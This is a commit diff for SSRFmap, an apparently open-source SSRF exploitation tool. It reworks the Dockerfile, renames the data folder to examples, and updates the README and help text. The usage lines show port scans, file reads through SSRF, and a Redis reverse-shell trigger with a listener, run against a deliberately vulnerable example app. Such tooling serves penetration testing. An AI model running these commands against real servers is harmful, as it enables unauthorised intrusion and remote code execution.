Dockerfile reworked + examples
parent
3eacb5d729
commit
7a04c5bb60
|
@ -104,3 +104,6 @@ venv.bak/
|
|||
|
||||
# mypy
|
||||
.mypy_cache/
|
||||
|
||||
# artifacts
|
||||
127.0.0.1_5000/
|
||||
|
|
17
Dockerfile
17
Dockerfile
|
@ -1,9 +1,14 @@
|
|||
FROM python:3-alpine3.10
|
||||
FROM python:3.12.4-alpine
|
||||
|
||||
WORKDIR /opt
|
||||
WORKDIR /usr/src/app
|
||||
COPY . /usr/src/app
|
||||
|
||||
RUN apk update && apk add git
|
||||
RUN git clone https://github.com/swisskyrepo/SSRFmap.git
|
||||
RUN cd /opt/SSRFmap && pip install -r requirements.txt
|
||||
RUN apk update && apk add curl
|
||||
|
||||
ENTRYPOINT ["python3","/opt/SSRFmap/ssrfmap.py"]
|
||||
# Install requirements
|
||||
RUN pip install -r requirements.txt
|
||||
|
||||
# Downgrade privileges
|
||||
USER 1000
|
||||
|
||||
ENTRYPOINT ["python3"]
|
33
README.md
33
README.md
|
@ -45,8 +45,7 @@ The following modules are already implemented and can be used with the `-m` argu
|
|||
|
||||
## Install and Manual
|
||||
|
||||
Basic install from the Github repository.
|
||||
|
||||
* From the Github repository.
|
||||
```powershell
|
||||
$ git clone https://github.com/swisskyrepo/SSRFmap
|
||||
$ cd SSRFmap/
|
||||
|
@ -72,10 +71,19 @@ $ python3 ssrfmap.py
|
|||
--level [LEVEL] Level of test to perform (1-5, default: 1)
|
||||
```
|
||||
|
||||
* Docker
|
||||
```powershell
|
||||
$ git clone https://github.com/swisskyrepo/SSRFmap
|
||||
$ docker build --no-cache -t ssrfmap .
|
||||
$ docker run -it ssrfmap ssrfmap.py [OPTIONS]
|
||||
$ docker run -it -v $(pwd):/usr/src/app ssrfmap ssrfmap.py
|
||||
```
|
||||
|
||||
|
||||
## Examples
|
||||
|
||||
First you need a request with a parameter to fuzz, Burp requests works well with SSRFmap.
|
||||
They should look like the following. More examples are available in the **/data** folder.
|
||||
They should look like the following. More examples are available in the **./examples** folder.
|
||||
|
||||
```powershell
|
||||
POST /ssrf HTTP/1.1
|
||||
|
@ -97,21 +105,21 @@ Use the `-m` followed by module name (separated by a `,` if you want to launch s
|
|||
|
||||
```powershell
|
||||
# Launch a portscan on localhost and read default files
|
||||
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan
|
||||
python ssrfmap.py -r examples/request.txt -p url -m readfiles,portscan
|
||||
```
|
||||
|
||||
If you need to have a custom user-agent use the `--uagent`. Some targets will use HTTPS, you can enable it with `--ssl`.
|
||||
|
||||
```powershell
|
||||
# Launch a portscan against an HTTPS endpoint using a custom user-agent
|
||||
python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
|
||||
python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
|
||||
```
|
||||
|
||||
Some modules allow you to create a connect back, you have to specify LHOST and LPORT. Also SSRFmap can listen for the incoming reverse shell.
|
||||
|
||||
```powershell
|
||||
# Triggering a reverse shell on a Redis
|
||||
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
|
||||
python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
|
||||
|
||||
# -l create a listener for reverse shell on the specified port
|
||||
# --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload
|
||||
|
@ -127,11 +135,20 @@ When the target is protected by a WAF or some filters you can try a wide range o
|
|||
|
||||
A quick way to test the framework can be done with `data/example.py` SSRF service.
|
||||
|
||||
* Local
|
||||
```powershell
|
||||
FLASK_APP=data/example.py flask run &
|
||||
python ssrfmap.py -r data/request.txt -p url -m readfiles
|
||||
FLASK_APP=examples/example.py flask run &
|
||||
python ssrfmap.py -r examples/request.txt -p url -m readfiles
|
||||
```
|
||||
|
||||
* Docker
|
||||
```ps1
|
||||
docker build --no-cache -t ssrfmap .
|
||||
docker run -it -v $(pwd):/usr/src/app --name example ssrfmap examples/example.py
|
||||
docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m readfiles
|
||||
```
|
||||
|
||||
|
||||
## Contribute
|
||||
|
||||
I :heart: pull requests :)
|
||||
|
|
|
@ -1,9 +1,8 @@
|
|||
# NOTE: do not try this at home - highly vulnerable ! (SSRF and RCE)
|
||||
# NOTE: this file should become a simple ssrf example in order to test SSRFmap
|
||||
# NOTE: Do not try this at home - highly vulnerable ! (SSRF and RCE)
|
||||
# NOTE: SSRF examples script
|
||||
# FLASK_APP=example.py flask run
|
||||
|
||||
from flask import Flask, abort, request
|
||||
import json
|
||||
from flask import Flask, request
|
||||
import re
|
||||
import subprocess
|
||||
|
|
@ -1,2 +1,2 @@
|
|||
Flask==2.3.2
|
||||
requests==2.21.0
|
||||
Flask==3.0.3
|
||||
requests==2.31.0
|
||||
|
|
10
ssrfmap.py
10
ssrfmap.py
|
@ -17,11 +17,11 @@ def display_banner():
|
|||
|
||||
def parse_args():
|
||||
example_text = '''Examples:
|
||||
python ssrfmap.py -r data/request2.txt -p url -m portscan
|
||||
python ssrfmap.py -r data/request.txt -p url -m redis
|
||||
python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
|
||||
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
|
||||
python ssrfmap.py -r data/request.txt -p url -m readfiles --rfiles
|
||||
python ssrfmap.py -r examples/request2.txt -p url -m portscan
|
||||
python ssrfmap.py -r examples/request.txt -p url -m redis
|
||||
python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
|
||||
python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
|
||||
python ssrfmap.py -r examples/request.txt -p url -m readfiles --rfiles
|
||||
'''
|
||||
parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)
|
||||
parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file")
|
||||
|
|
Loading…
Reference in New Issue